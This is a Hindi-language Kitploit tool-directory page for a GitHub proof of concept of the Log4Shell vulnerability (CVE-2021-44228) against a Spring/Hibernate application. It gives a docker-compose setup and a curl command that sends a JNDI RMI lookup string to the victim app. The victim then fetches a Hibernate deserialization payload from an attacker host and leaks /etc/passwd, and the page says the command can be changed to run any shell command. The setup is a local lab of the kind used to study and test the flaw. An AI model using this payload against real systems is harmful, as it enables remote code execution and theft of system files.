Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/uint0/cve-2021-44228--spring-hibernate
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubuint0/cve-2021-44228--spring-hibernate

cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

रिपॉजिटरी देखें
164 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44228 POC - Spring / Hibernate

यह POC Spring / Hibernate का उपयोग करता है, हालाँकि rmi -> deserialization का समान दृष्टिकोण किसी भी deserialization भेद्यता को ट्रिगर करने के लिए उपयोग किया जा सकता है।

संक्षेप में

$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

आपको पीड़ित के /etc/passwd की सामग्री attacker कंटेनर के लॉग में दिखाई देनी चाहिए। आप पीड़ित पर कोई भी shell command चलाने के लिए exploit सेवा में कमांड को बदल सकते हैं।

पीड़ित

पीड़ित एक मानक starter spring app चला रहा है जिसमें "Spring Data JPA" (Hibernate के लिए), "Spring Web", और "H2" (डेटा स्टोर के रूप में) निर्भरताएँ हैं। इसके अतिरिक्त केवल 2 संशोधन किए गए हैं।

  1. टेस्ट हटाए गए
  2. slf4j लॉगर को भेद्य log4j से बदल दिया गया

सभी निर्भरताएँ अद्यतित हैं। कोई जादुई फ्लैग सक्षम नहीं हैं।

पीड़ित / पर एक POST-able एंडपॉइंट प्रदर्शित करता है जो अनुरोध को लॉग करेगा।

एक्सप्लॉइट

एक्सप्लॉइट ysoserial के एक फ़ोर्क पर निर्भर करता है जो Hibernate एक्सप्लॉइट जनरेटर का उपयोग करता है। एक्सप्लॉइट को hibernate के नवीनतम संस्करण के साथ काम करने के लिए हमें ysoserial को पुनः संकलित करने की आवश्यकता होगी।

टूल डाउनलोड करें